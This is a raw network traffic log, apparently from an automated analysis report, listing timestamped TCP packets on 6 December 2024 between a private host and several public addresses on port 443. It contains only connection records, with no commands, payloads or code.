                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.571332932 CET4434972923.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.572170973 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.583934069 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.584069014 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.584078074 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.587946892 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.588365078 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.588371038 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.595926046 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.596026897 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.596034050 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.603995085 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.604074955 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.604214907 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.604578972 CET49723443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.604593992 CET44349723151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.618920088 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.666743040 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.712908030 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.836427927 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.839590073 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.839688063 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.839701891 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846050024 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846106052 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846115112 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846127033 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846239090 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846297026 CET49724443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.846308947 CET44349724151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.873064995 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.873296976 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.874339104 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.874509096 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.874516964 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.874614954 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.875477076 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.876687050 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.876790047 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.876794100 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.881683111 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.881820917 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.881825924 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.886874914 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.887733936 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.887761116 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.887960911 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.887983084 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.888048887 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.888967037 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.891422033 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.892544985 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.892666101 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.892683983 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.893791914 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.894314051 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.894324064 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.895131111 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.895257950 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.895271063 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.896348953 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.896375895 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.896435976 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.896446943 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.896887064 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.897433996 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.897855997 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.897867918 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.902827024 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.902945042 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.902954102 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.903637886 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.903697014 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.903860092 CET44349728151.101.130.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.903924942 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.903924942 CET49728443192.168.2.16151.101.130.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.906872988 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.912039042 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.912115097 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.912123919 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.950959921 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.966952085 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:19.993248940 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.006824970 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.046935081 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.046958923 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.046976089 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.052455902 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.054337025 CET4434972923.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.054430962 CET4434972923.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.054956913 CET49729443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.055248022 CET49729443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.055268049 CET4434972923.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.055299997 CET49729443192.168.2.1623.218.208.109
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.055306911 CET4434972923.218.208.109192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.064917088 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.068856001 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.069072962 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.069101095 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.069108009 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.071449995 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.075443983 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.083734035 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.083823919 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.083827972 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.092108011 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.092364073 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.092367887 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.094934940 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.094954967 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.100004911 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.100287914 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.100292921 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101197958 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101207972 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101239920 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101253033 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101274967 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101305008 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101313114 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.101337910 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.102468014 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.115611076 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.115772009 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.115776062 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122885942 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122900009 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122927904 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122940063 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122956038 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122966051 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.122980118 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.123038054 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.123038054 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.123387098 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.123503923 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.123507977 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.131452084 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.131556034 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.131561041 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.138199091 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.138546944 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.138550997 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.144679070 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.144752026 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.144756079 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.151177883 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.151271105 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.151274920 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.191015959 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.259670019 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.259718895 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.259802103 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.259807110 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.265500069 CET49732443192.168.2.1620.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.265547037 CET4434973220.109.210.53192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.265691996 CET49732443192.168.2.1620.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.267256975 CET49732443192.168.2.1620.109.210.53
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.267268896 CET4434973220.109.210.53192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270867109 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270876884 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270906925 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270916939 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270941973 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.270956993 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.271014929 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.271274090 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280659914 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280683041 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280726910 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280760050 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280780077 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280791044 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280805111 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.280906916 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286298990 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286309004 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286333084 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286346912 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286355972 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286381006 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286387920 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286413908 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286416054 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.286437988 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.287910938 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300343990 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300353050 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300379992 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300410032 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300421953 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300436020 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300462008 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.300514936 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.310123920 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.310164928 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.310267925 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.310277939 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.310444117 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315589905 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315619946 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315629959 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315642118 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315664053 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315670967 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.315762997 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.330051899 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.330075979 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.330183029 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.330195904 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.331187963 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.343851089 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.344232082 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.344243050 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.347990036 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348018885 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348030090 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348042965 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348124981 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348124981 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.348134995 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.365231037 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.365253925 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.365365028 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.365380049 CET44349727151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.365739107 CET49727443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.396945953 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.396966934 CET44349722216.137.52.21192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.397000074 CET49726443192.168.2.16151.101.2.152
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.444958925 CET49722443192.168.2.16216.137.52.21
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.457357883 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.457366943 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.457396030 CET44349726151.101.2.152192.168.2.16
                                                                                                                                                                                                                                                                                                                                                                                        Dec 6, 2024 22:59:20.457405090 CET44349726151.101.2.152192.168.2.16
